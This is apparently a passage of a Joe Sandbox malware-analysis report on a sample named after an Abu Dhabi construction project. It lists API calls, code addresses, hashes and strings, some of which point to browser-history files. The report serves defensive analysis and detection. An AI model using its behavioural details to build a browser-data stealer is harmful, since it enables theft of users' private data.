                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                                          Similarity
                                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1355100292-0
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                                            • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                                            • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                                          • memset.MSVCRT ref: 00403A55
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                                          • String ID: history.dat$places.sqlite
                                                                                                                          • API String ID: 2641622041-467022611
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 839530781-0
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: FileFindFirst
                                                                                                                          • String ID: *.*$index.dat
                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1156039329-0
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseCreateHandleTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3397143404-0
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                          Similarity
                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1125800050-0
                                                                                                                          APIs
                                                                                                                          • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                                          • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseHandleSleep
                                                                                                                          • String ID: }A
                                                                                                                          • API String ID: 252777609-2138825249
                                                                                                                          APIs
                                                                                                                          • malloc.MSVCRT ref: 00409A10
                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                                          • free.MSVCRT ref: 00409A31
                                                                                                                          Similarity
                                                                                                                          • API ID: freemallocmemcpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3056473165-0
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d
                                                                                                                          • API String ID: 0-2564639436
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID: BINARY
                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Similarity
                                                                                                                          • API ID: _wcsicmp
                                                                                                                          • String ID: /stext
                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                          • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                          Similarity
                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2445788494-0
                                                                                                                          • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                          • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                          Similarity
                                                                                                                          • API ID: malloc
                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                          • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                          • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                                          • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                                          • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0041BDDF
                                                                                                                          • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmpmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1065087418-0
                                                                                                                          • Opcode ID: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                          • Opcode Fuzzy Hash: fec4f8c686635726a589492d039bcbb9c6040c3e4ffa7e28f30a1ad23493d54b
                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040ECF9
                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,?,00410C56,?), ref: 0040EDC0
                                                                                                                          • GetStdHandle.KERNEL32(000000F5,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410530
                                                                                                                          • CloseHandle.KERNELBASE(00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00410654
                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                                                                                          Similarity
                                                                                                                          • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1381354015-0
                                                                                                                          • Opcode ID: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                          • Opcode Fuzzy Hash: 77225ea8c14d98a1088d43b9fd7330a512e035650861724d713e236cc530cbe1
                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                          APIs
                                                                                                                          Similarity
                                                                                                                          • API ID: memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2221118986-0
                                                                                                                          • Opcode ID: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                          • Opcode Fuzzy Hash: 91f73f7a852cbb4360dbb9cf7f888a1e4609bdf8e01f9823d17442fd23f8c43f
                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                          APIs
                                                                                                                          Similarity
                                                                                                                          • API ID: free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1294909896-0
                                                                                                                          • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                          • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                            • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2154303073-0
                                                                                                                          • Opcode ID: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                          • Opcode Fuzzy Hash: b49b02137a533de872d41cf471f5063eaa0d82b3b55f9ade19adc7adaa1443d9
                                                                                                                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                          Similarity
                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3150196962-0
                                                                                                                          • Opcode ID: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                          • Opcode Fuzzy Hash: be26bcaf2987f4035eeff70895753d9ab226293c41c78703657a1ba2214892b4
                                                                                                                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                          APIs
                                                                                                                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Similarity
                                                                                                                          • API ID: File$PointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3154509469-0
                                                                                                                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                          APIs
                                                                                                                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4232544981-0
                                                                                                                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressProc$FileModuleName
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3859505661-0
                                                                                                                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                          APIs
                                                                                                                          • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3934441357-0
                                                                                                                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                          APIs
                                                                                                                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeLibrary
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3664257935-0
                                                                                                                          • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                          • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2221320389.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000005.00000002.2221320389.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateFile
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 823142352-0
                                                                                                                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                          Memory Dump Source
